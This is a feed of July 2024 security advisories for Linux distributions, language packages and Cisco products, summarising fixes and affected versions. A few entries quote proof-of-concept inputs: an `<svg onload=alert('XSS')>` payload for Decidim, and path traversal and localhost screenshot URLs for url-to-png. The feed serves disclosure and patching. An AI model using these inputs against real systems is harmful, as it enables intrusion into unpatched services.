10.07.2024 09:07:01 | ubuntu | [USN-6889-1] .NET vulnerabilities (high) | Several security issues were fixed in dotnet6, dotnet8. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6889-1
10.07.2024 08:51:27 | ubuntu | [USN-6890-1] Firefox vulnerabilities | Several security issues were fixed in Firefox. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6890-1
10.07.2024 03:00:00 | debian | [DSA-5727-1] firefox-esr | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5727-1
10.07.2024 03:00:00 | debian | [DSA-5728-1] exim4 (medium) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5728-1
10.07.2024 03:00:00 | gentoo | [GLSA-202407-25] Buildah: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in Buildah, the worst of which could lead to privilege escalation. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-25
10.07.2024 03:00:00 | gentoo | [GLSA-202407-24] HarfBuzz: Denial of Service (normal) | A vulnerability has been discovered in HarfBuzz, which can lead to a denial of service. | https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-24
10.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4450] dotnet8.0 security update (important) | [8.0.107-1.0.1] - Add support for Oracle Linux; [8.0.107-1] - Update to .NET SDK 8.0.107 and Runtime 8.0.7 - Resolves: RHEL-45324 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4450
10.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4451] dotnet8.0 security update (important) | [8.0.107-1.0.1] - Add support for Oracle Linux; [8.0.107-1] - Update to .NET SDK 8.0.107 and Runtime 8.0.7 - Resolves: RHEL-45322 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4451
10.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4457] openssh security update (moderate) | [8.7p1-38.0.2.4] - Possible remote code execution due to a race condition (CVE-2024-6409) - Resolves: RHEL-45741 | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4457
10.07.2024 03:00:00 | redhat | [RHSA-2024:4451] dotnet8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.107 and Runtime 8.0.7. Security Fix(es): * dotnet: DoS in System.Text.Json (CVE-2024-30105); * dotnet: DoS in ASP.NET Core 8 (CVE-2024-35264); * dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4451
10.07.2024 03:00:00 | redhat | [RHSA-2024:4450] dotnet8.0 security update (important) | .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 8.0.107 and Runtime 8.0.7. Security Fix(es): * dotnet: DoS in System.Text.Json (CVE-2024-30105); * dotnet: DoS in ASP.NET Core 8 (CVE-2024-35264); * dotnet: DoS when parsing X.509 Content and ObjectIdentifiers (CVE-2024-38095). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4450
10.07.2024 17:26:30 | maven | [MAVEN:GHSA-VFWH-GVF6-MFF8] Silverpeas Core Cross-site Scripting vulnerability (moderate) | In Silverpeas Core <= 6.3.5, inside of mes agendas a user can create a new event and add it to his calendar. The user can also add other users to the event from the same domain, including administrator. A normal user can create an event with XSS payload inside `Titre` and `Description` parameters and add the administrator or any user to the event. When the other user (victim) visits his own profile (even without clicking on the event) the payload will be executed on the victim side. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-VFWH-GVF6-MFF8
10.07.2024 16:08:28 | almalinux | [ALSA-2024:4422] fence-agents security update (moderate) | fence-agents security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4422
10.07.2024 12:03:22 | almalinux | [ALSA-2024:4439] dotnet6.0 security update (moderate) | dotnet6.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4439
12.07.2024 00:29:38 | ubuntu | [USN-6864-3] Linux kernel (GKE) vulnerabilities (medium) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6864-3
11.07.2024 23:08:16 | ubuntu | [USN-6894-1] Apport vulnerabilities (high) | Several security issues were fixed in Apport. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6894-1
11.07.2024 22:01:12 | ubuntu | [USN-6893-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-1
11.07.2024 20:25:58 | ubuntu | [USN-6885-2] Apache HTTP Server regression | USN-6885-1 introduced a regression in Apache HTTP Server. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-2
11.07.2024 14:54:39 | ubuntu | [USN-6891-1] Python vulnerabilities (critical) | Several security issues were fixed in Python. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6891-1
11.07.2024 13:41:49 | ubuntu | [USN-6888-2] Django vulnerabilities (medium) | Several security issues were fixed in Django. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6888-2
11.07.2024 03:00:00 | debian | [DSA-5729-1] apache2 (critical) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5729-1
11.07.2024 11:44:08 | almalinux | [ALSA-2024:4451] dotnet8.0 security update (important) | dotnet8.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4451
11.07.2024 11:47:10 | almalinux | [ALSA-2024:4450] dotnet8.0 security update (important) | dotnet8.0 security update | https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4450
11.07.2024 03:00:00 | freebsd | [FREEBSD:ACB4EAB6-3F6D-11EF-8657-001B217B3468] Gitlab -- vulnerabilities (critical) | Gitlab reports: An attacker can run pipeline jobs as an arbitrary user; Developer user with admin_compliance_framework permission can change group URL; Admin push rules custom role allows creation of project level deploy token; Package registry vulnerable to manifest confusion; User with admin_group_member permission can ban group members; Subdomain takeover in GitLab Pages | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:ACB4EAB6-3F6D-11EF-8657-001B217B3468
11.07.2024 23:22:56 | rubysec | [RUBYSEC:DECIDIM-2024-27090] Decidim vulnerable to data disclosure through the embed feature (medium) | Impact: If an attacker can infer the slug or URL of an unpublished or private resource, and this resource can be embedded (such as a Participatory Process, an Assembly, a Proposal, a Result, etc), then some data of this resource could be accessed. Patches: Version 0.27.6, https://github.com/decidim/decidim/commit/1756fa639ef393ca8e8bb16221cab2e2e7875705. Workarounds: Disallow access through your web server to the URLs finished with `/embed.html`. | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-27090
11.07.2024 23:22:56 | rubysec | [RUBYSEC:DECIDIM-2024-32469] Decidim cross-site scripting (XSS) in the pagination (high) | Impact: The pagination feature used in searches and filters is subject to potential XSS attack through a malformed URL using the GET parameter `per_page`. Patches: Patched in version 0.27.6 and 0.28.1. References: OWASP ASVS v4.0.3-5.1.3. Credits: This issue was discovered in a security audit organized by the [mitgestalten Partizipationsbüro](https://partizipationsbuero.at/) and funded by [netidee](https://www.netidee.at/) against Decidim done during April 2024. The security audit was implemented by [AIT Austrian Institute of Technology GmbH](https://www.ait.ac.at/), | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-32469
11.07.2024 23:22:56 | rubysec | [RUBYSEC:DECIDIM-ADMIN-2024-27095] Decidim cross-site scripting (XSS) in the admin panel (medium) | Impact: The admin panel is subject to potential XSS attack in case the attacker manages to modify some records being uploaded to the server. The attacker is able to change e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves, and then enter the returned blob ID to the form inputs manually by modifying the edit page source. Patches: Available in versions 0.27.6 and 0.28.1. Workarounds: Review the user accounts that have access to the admin panel (i.e. general Administrators, and participatory space's Administrators) and remove access to them if they don't need it. References: OWASP ASVS v4.0.3-5.1.3 | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-ADMIN-2024-27095
12.07.2024 19:34:08 | go | [GO-2024-2980] NATS Server and Streaming Server fails to enforce negative user permissions, may allow denied subjects in github.com/nats-io/nats-server | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2980
12.07.2024 19:34:08 | go | [GO-2024-2981] SQL Injection in the KubeClarity REST API in github.com/openclarity/kubeclarity/backend (medium) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2981
12.07.2024 19:34:08 | go | [GO-2024-2982] Hashicorp Vault vulnerable to Improper Check or Handling of Exceptional Conditions in github.com/hashicorp/vault (high) | | https://secdb.nttzen.cloud/security-advisory/go/GO-2024-2982
13.07.2024 00:00:44 | maven | [MAVEN:GHSA-HHWC-GH8H-9RRP] Apache Wicket: Remote code execution via XSLT injection (high) | The default configuration of XSLTResourceStream.java is vulnerable to remote code execution via XSLT injection when processing input from an untrusted source without validation. Users are recommended to upgrade to versions 10.1.0, 9.18.0 or 8.16.0, which fix this issue. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-HHWC-GH8H-9RRP
12.07.2024 17:12:19 | ubuntu | [USN-6896-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-1
12.07.2024 13:02:16 | ubuntu | [USN-6895-1] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-1
12.07.2024 03:00:00 | oraclelinux | [ELSA-2024-4502] skopeo security update (important) | [2:1.14.3-3] - golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394) | https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4502
13.07.2024 03:00:00 | freebsd | [FREEBSD:55D4A92F-C75F-43E8-AB1F-4A0EFC9795C4] electron29 -- multiple vulnerabilities (high) | Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-6291. Security: backported fix for CVE-2024-6293. Security: backported fix for CVE-2024-6290. Security: backported fix for CVE-2024-6292. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:55D4A92F-C75F-43E8-AB1F-4A0EFC9795C4
13.07.2024 03:00:00 | freebsd | [FREEBSD:6410F91D-1214-4F92-B7E0-852E39E265F9] electron30 -- multiple vulnerabilities (high) | Electron developers report: This update fixes the following vulnerabilities: Security: backported fix for CVE-2024-5493. Security: backported fix for CVE-2024-5831. Security: backported fix for CVE-2024-5832. Security: backported fix for CVE-2024-6100. Security: backported fix for CVE-2024-6101. Security: backported fix for CVE-2024-6103. Security: backported fix for CVE-2024-6291. Security: backported fix for CVE-2024-6293. Security: backported fix for CVE-2024-6290. Security: backported fix for CVE-2024-6292. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:6410F91D-1214-4F92-B7E0-852E39E265F9
16.07.2024 00:38:11 | npm | [NPM:GHSA-H3PQ-667X-R789] Plate media plugins has a XSS in media embed element when using custom URL parsers (high) | Impact: Editors that use `MediaEmbedElement` and pass custom `urlParsers` to the `useMediaState` hook may be vulnerable to XSS if a custom parser allows `javascript:`, `data:` or `vbscript:` URLs to be embedded. Editors that do not use `urlParsers` and instead consume the `url` property directly may also be vulnerable if the URL is not sanitised. The default parsers `parseTwitterUrl` and `parseVideoUrl` are not affected. Examples of vulnerable code (tsx): `const { embed } = useMediaState({ urlParsers: [ /* custom parser that does not use an allowlist or validate the URL protocol */ (url) => ({ url }) ] }); return (<iframe src={embed!.url} /* ... */ />);` and `const { url } = useMediaState(); return (<iframe src={url} /* url property used directly from useMediaState() with no sanitisation */ />);` and `const { url } = element; return (<iframe src={url} /* url property used directly from element with no sanitisation */ />);`. Patches: `@udecode/plate-media` 36.0.10 resolves this issue by only allowing HTTP and HTTPS URLs during parsing. This affects only the `embed` property returned from `useMediaState`. In addition, the `url` property returned from `useMediaState` has been renamed to `unsafeUrl` to indicate that it has not been sanitised. The `url` property on `element` is also unsafe, but has not been renamed. If you're using either of these properties directly, you will still need to validate the URL yourself. Workarounds: Ensure that any custom `urlParsers` do not allow `javascript:`, `data:` or `vbscript:` URLs to be returned in the `url` property of their return values. If `url` is consumed directly, validate the URL protocol before passing it to the `iframe` element. References: How to verify the protocol of a URL: https://stackoverflow.com/a/43467144 | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-H3PQ-667X-R789
16.07.2024 00:38:46 | npm | [NPM:GHSA-342Q-2MC2-5GMP] @jmondi/url-to-png enables capture screenshot of localhost web services (unauthenticated pages) (low) | Summary: The maintainer has been contemplating whether FTP or other protocols could serve as useful functionalities, but there may not be a practical reason for it since we are utilizing headless Chrome to capture screenshots. The argument is based on the assumption that this package can function as a service. The package includes an `ALLOW_LIST` where the host can specify which services the user is permitted to capture screenshots of. By default, capturing screenshots of web services running on localhost, 127.0.0.1, or the [::] is allowed. The maintainer is of the opinion that the package should also have a blacklist due to a potential vulnerability (or rather design oversight). If someone hosts this on a server, users could then capture screenshots of other web services running locally. Unless this is strictly for web pages. Something similar here: https://github.com/follow-redirects/follow-redirects/issues/235 (localhost is intended for end users or hosts to deny, and the package is for HTTP/HTTPS.) This is marked as a `LOW` since the maintainer is not sure if this is a vulnerability, but it's still best to highlight it. 🙂 PoC: Have a service like so running locally (js): `const http = require("http"); const server = http.createServer((req, res) => { console.log("Received headers:", req.headers); res.writeHead(200, { "Content-Type": "text/plain" }); res.end("Something private! But Hello from Server 2 :)"); }); server.listen(3001, () => { console.log("Server two running on http://localhost:3001"); });` Run the package in dev mode, `pnpm dev`. Feed these URLs: `http://localhost:3089/?url=http://[::]:3001&width=4000`, `http://localhost:3089/?url=http://localhost:3001&width=4000`, `http://localhost:3089/?url=http://127.0.01:3001&width=4000`. Impact: Disclose internal web services? | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-342Q-2MC2-5GMP
16.07.2024 00:38:36 | npm | [NPM:GHSA-VVMV-WRVP-9GJR] @jmondi/url-to-png contains a Path Traversal vulnerability (moderate) | Summary: When trying to add a `BLOCK_LIST` feature, the maintainer noticed they didn't sanitize the `ImageId` in the code, which leads to a path traversal vulnerability. Now, this is different from a traditional path traversal issue, because as of NOW you can store the image in any place arbitrarily, and given enough time they might be able to come up with a working exploit, BUT for the time being they are reporting this. Details: @jmondi/url-to-png does not sanitize the `ImageID`, as in not removing special chars from the params [(extract_query_params.ts#l75)](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75): `const imageId = dateString + "." + slugify(validData.url) + configToString(params);`. This, when fed to other parts of the code such as ([filesystem.ts#L34](https://github.com/jasonraimondi/url-to-png/blob/8afc00247c1d7e6c7b37356a5f6282b486e596fa/src/lib/storage/filesystem.ts#L34)) `return path.join(this.storagePath, imageId) + ".png";`, would result in a path traversal issue. PoC: Configuration for the filesystem storage provider (optional): `STORAGE_PROVIDER=filesystem`, `IMAGE_STORAGE_PATH=poc`. Set this in your `.env` file and use this as your payload: `http://localhost:3089/?url=http://example.com&width=400&isDarkMode=../../../../../../../../../../../../tmp/hack`. This will create a `.png` file in the `/tmp` section of the system. Loom POC: https://www.loom.com/share/bd7b306cdae7445c97e68f0626e743a6. This is valid for pretty much all the arguments (except for numeric values). A simple fix would be to use the `slugify` for the params as well like so ([#L75](https://github.com/jasonraimondi/url-to-png/blob/e43098e0af3a380ebc044e7f303a83933b94b434/src/middlewares/extract_query_params.ts#L75)) (diff): `- const imageId = dateString + "." + slugify(validData.url) + configToString(params);` `+ const imageId = dateString + "." + slugify(validData.url) + slugify(configToString(params));`. Impact: This would be a path traversal vulnerability which allows arbitrary write as of now. | https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VVMV-WRVP-9GJR
15.07.2024 19:11:24 | ubuntu | [USN-6898-1] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6898-1
15.07.2024 15:20:00 | rockylinux | [RLSA-2024:4212] golang security update (moderate) | An update is available for golang. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4212
15.07.2024 15:20:00 | rockylinux | [RLSA-2024:4500] firefox security update (important) | An update is available for firefox. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4500
15.07.2024 15:20:00 | rockylinux | [RLSA-2024:4450] dotnet8.0 security update (important) | An update is available for dotnet8.0. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4450
15.07.2024 15:20:00 | rockylinux | [RLSA-2024:4457] openssh security update (moderate) | An update is available for openssh. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4457
15.07.2024 15:19:59 | rockylinux | [RLSA-2024:4349] kernel security and bug fix update (moderate) | An update is available for kernel. This update affects Rocky Linux 9. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE list. | https://secdb.nttzen.cloud/security-advisory/rockylinux/RLSA-2024:4349
15.07.2024 14:27:33 | ubuntu | [USN-6897-1] Ghostscript vulnerabilities (high) | Several security issues were fixed in Ghostscript. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6897-1
15.07.2024 20:40:59 | maven | [MAVEN:GHSA-7QPC-4XX9-X5QW] Apache Linkis DataSource's JDBC Datasource Module with DB2 has JNDI Injection vulnerability (high) | In Apache Linkis <=1.5.0, due to the lack of effective filtering of parameters, an attacker configuring malicious `db2` parameters in the DataSource Manager Module will result in jndi injection. Therefore, the parameters in the DB2 URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis <=1.5.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-7QPC-4XX9-X5QW
15.07.2024 20:36:38 | maven | [MAVEN:GHSA-JJVC-V8GW-5255] Apache Linkis DataSource remote code execution vulnerability (high) | In Apache Linkis <= 1.5.0, the data source management module, when adding a Mysql data source, has a remote code execution vulnerability for java version < 1.8.0_241. The deserialization vulnerability exploited through jrmp can inject malicious files into the server and execute them. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. We recommend that users upgrade the java version to >= 1.8.0_241. Or users upgrade Linkis to version 1.6.0. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-JJVC-V8GW-5255
15.07.2024 20:35:54 | maven | [MAVEN:GHSA-F22J-9J59-33J4] Apache Linkis DataSource allows arbitrary file reading (moderate) | In Apache Linkis = 1.4.0, due to the lack of effective filtering of parameters, an attacker configuring malicious Mysql JDBC parameters in the DataSource Manager Module will trigger arbitrary file reading. Therefore, the parameters in the Mysql JDBC URL should be blacklisted. This attack requires the attacker to obtain an authorized account from Linkis before it can be carried out. Versions of Apache Linkis = 1.4.0 will be affected. We recommend users upgrade the version of Linkis to version 1.6.0. | https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F22J-9J59-33J4
15.07.2024 03:00:00 | cisa | [CISA-2024:0715] CISA Adds One Known Exploited Vulnerability to Catalog (critical) | CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. | https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0715
15.07.2024 03:00:00 | debian | [DSA-5730-1] linux (critical) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5730-1
15.07.2024 03:00:00 | redhat | [RHSA-2024:4502] skopeo security update (important) | The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files. Security Fix(es): * golang-fips/openssl: Memory leaks in code encrypting and decrypting RSA payloads (CVE-2024-1394). For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. | https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:4502
16.07.2024 16:03:44 | ubuntu | [USN-6899-1] GTK vulnerability (high) | GTK could be made to run programs from the current directory. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6899-1
16.07.2024 14:59:00 | xen | [XSA-458] double unlock in x86 guest IRQ handling | ISSUE DESCRIPTION: An optional feature of PCI MSI called "Multiple Message" allows a device to use multiple consecutive interrupt vectors. Unlike for MSI-X, the setting up of these consecutive vectors needs to happen all in one go. In this handling an error path could be taken in different situations, with or without a particular lock held. This error path wrongly releases the lock even when it is not currently held. IMPACT: Denial of Service (DoS) affecting the entire host, crashes, information leaks, or elevation of privilege all cannot be ruled out. VULNERABLE SYSTEMS: Xen versions 4.4 and newer are vulnerable. Xen versions 4.3 and older are not vulnerable. Only x86 guests which have a multi-vector MSI capable device passed through to them can leverage the vulnerability. | https://secdb.nttzen.cloud/security-advisory/xen/XSA-458
16.07.2024 14:59:00 | xen | [XSA-459] Xapi: Metadata injection attack against backup/restore functionality | ISSUE DESCRIPTION: For a brief summary of Xapi terminology, see: https://xapi-project.github.io/xen-api/overview.html#object-model-overview. Xapi contains functionality to backup and restore metadata about Virtual Machines and Storage Repositories (SRs). The metadata itself is stored in a Virtual Disk Image (VDI) inside an SR. This is used for two purposes; a general backup of metadata (e.g. to recover from a host failure if the filer is still good), and Portable SRs (e.g. using an external hard drive to move VMs to another host). Metadata is only restored as an explicit administrator action, but occurs in cases where the host has no information about the SR, and must locate the metadata VDI in order to retrieve the metadata. The metadata VDI is located by searching (in UUID alphanumeric order) each VDI, mounting it, and seeing if there is a suitable metadata file present. The first matching VDI is deemed to be the metadata VDI, and is restored from. In the general case, the content of VDIs are controlled by the VM owner, and should not be trusted by the host administrator. A malicious guest can manipulate its disk to appear to be a metadata backup. A guest cannot choose the UUIDs of its VDIs, but a guest with one disk has a 50% chance of sorting ahead of the legitimate metadata backup. A guest with two disks has a 75% chance, etc. IMPACT: If a fraudulent metadata backup has been written into an SR which also contains a legitimate metadata backup, and an administrator explicitly chooses to restore from backup, the fraudulent metadata might be consumed instead of the legitimate metadata. Control over metadata includes: which VMs are created, disk assignment, vCPU/RAM requirements, GPU allocation, etc. VULNERABLE SYSTEMS: Systems running Xapi v1.249.x are affected. Systems running Xapi v24.x are potentially affected. However, it is believed that the only supported products using this version of Xapi have not shipped the metadata backup/restore functionality. To leverage the vulnerability, an attacker would likely need insider information to construct a plausible-looking metadata backup, and would have to persuade a real administrator to perform a data-recovery action. | https://secdb.nttzen.cloud/security-advisory/xen/XSA-459
16.07.2024 14:47:17 | ubuntu | [USN-6896-2] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-2
16.07.2024 13:12:28 | ubuntu | [USN-6895-2] Linux kernel vulnerabilities (high) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6895-2
16.07.2024 12:17:22 | ubuntu | [USN-6893-2] Linux kernel vulnerabilities (critical) | Several security issues were fixed in the Linux kernel. | https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6893-2
16.07.2024 03:00:00 | debian | [DSA-5731-1] linux (high) | security update | https://secdb.nttzen.cloud/security-advisory/debian/DSA-5731-1
16.07.2024 03:00:00 | freebsd | [FREEBSD:3B018063-4358-11EF-B611-84A93843EB75] MySQL -- Multiple vulnerabilities | Oracle reports: 36 new security patches for Oracle MySQL. 11 of these vulnerabilities may be remotely exploitable without authentication, i.e., may be exploited over a network without requiring user credentials. The highest CVSS v3.1 Base Score of vulnerabilities affecting Oracle MySQL is 9.8. | https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:3B018063-4358-11EF-B611-84A93843EB75
16.07.2024 19:59:47 | rubysec | [RUBYSEC:REXML-2024-39908] DoS in REXML (medium) | There is a DoS vulnerability in REXML gem. This vulnerability has been assigned the CVE identifier CVE-2024-39908. We strongly recommend upgrading the REXML gem. Details: When it parses an XML that has many specific characters such as <, 0 and %>, REXML gem may take a long time. Please update REXML gem to version 3.3.2 or later. Affected versions: REXML gem 3.3.2 or prior. Credits: Thanks to mprogrammer for discovering this issue. History: Originally published at 2024-07-16 03:00:00 (UTC). | https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:REXML-2024-39908
17.07.2024 22:35:44 | slackware | [SSA:2024-199-01] openssl (critical) | New openssl packages are available for Slackware 15.0 and -current to fix security issues. Here are the details from the Slackware 15.0 ChangeLog: `patches/packages/openssl-1.1.1za-i586-1_slack15.0.txz: Upgraded.` Apply patches to fix CVEs that were fixed by the 1.1.1{x,y,za} releases that were only available to subscribers to OpenSSL's premium extended support. These patches were prepared by backporting commits from the OpenSSL-3.0 repo. The reported version number has been updated so that vulnerability scanners calm down. All of these issues were considered to be of low severity. Thanks to Ken Zalewski for the patches! For more information, see: https://www.cve.org/CVERecord?id=CVE-2023-5678, https://www.cve.org/CVERecord?id=CVE-2024-0727, https://www.cve.org/CVERecord?id=CVE-2024-2511, https://www.cve.org/CVERecord?id=CVE-2024-4741, https://www.cve.org/CVERecord?id=CVE-2024-5535 (* Security fix *). `patches/packages/openssl-solibs-1.1.1za-i586-1_slack15.0.txz: Upgraded.` Where to find the new packages: Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Updated packages for Slackware 15.0: ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-1.1.1za-i586-1_slack15.0.txz, ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/openssl-solibs-1.1.1za-i586-1_slack15.0.txz. Updated packages for Slackware x86_64 15.0: ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-1.1.1za-x86_64-1_slack15.0.txz, ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/openssl-solibs-1.1.1za-x86_64-1_slack15.0.txz. Updated packages for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/openssl11-solibs-1.1.1za-i586-1.txz, ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/openssl11-1.1.1za-i586-1.txz. Updated packages for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/openssl11-solibs-1.1.1za-x86_64-1.txz, ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/openssl11-1.1.1za-x86_64-1.txz. MD5 signatures: see the linked advisory. Installation instructions: Upgrade the packages as root: `# upgradepkg openssl-1.1.1za-i586-1_slack15.0.txz openssl-solibs-1.1.1za-i586-1_slack15.0.txz` | https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-199-01
17.07.2024 19:22:29ubuntu[USN-6896-3] Linux kernel vulnerabilities (critical)Several security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6896-3
17.07.2024 19:00:00cisco[CISCO-SA-WEBEX-APP-ZJNM8X8J] Cisco Webex App Vulnerabilities (medium)Multiple vulnerabilities in Cisco Webex App could allow an unauthenticated attacker to gain access to sensitive credential information.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. The updates are part of the Cisco Webex service, and no customer action is necessary to get these software updates. There are no workarounds that address these vulnerabilities.https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-WEBEX-APP-ZJNM8X8J
17.07.2024 19:00:00 | cisco | [CISCO-SA-SWA-PRIV-ESC-7UHPZSCC] Cisco Secure Web Appliance Privilege Escalation Vulnerability (high)
A vulnerability in the CLI of Cisco AsyncOS for Secure Web Appliance could allow an authenticated, local attacker to execute arbitrary commands and elevate privileges to root.
This vulnerability is due to insufficient validation of user-supplied input for the CLI. An attacker could exploit this vulnerability by authenticating to the system and executing a crafted command on the affected device. A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system and elevate privileges to root. To successfully exploit this vulnerability, an attacker would need at least guest credentials.
Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.
https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SWA-PRIV-ESC-7UHPZSCC

17.07.2024 19:00:00 | cisco | [CISCO-SA-SB-RV34X-RCE-7PQFU2E] Cisco RV340 and RV345 Dual WAN Gigabit VPN Routers Authenticated Remote Code Execution Vulnerability (medium)
A vulnerability in the upload module of Cisco RV340 and RV345 Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to execute arbitrary code on an affected device.
This vulnerability is due to insufficient boundary checks when processing specific HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to an affected device. A successful exploit could allow the attacker to execute arbitrary code as the root user on the underlying operating system of the device.
There are no workarounds that address this vulnerability.
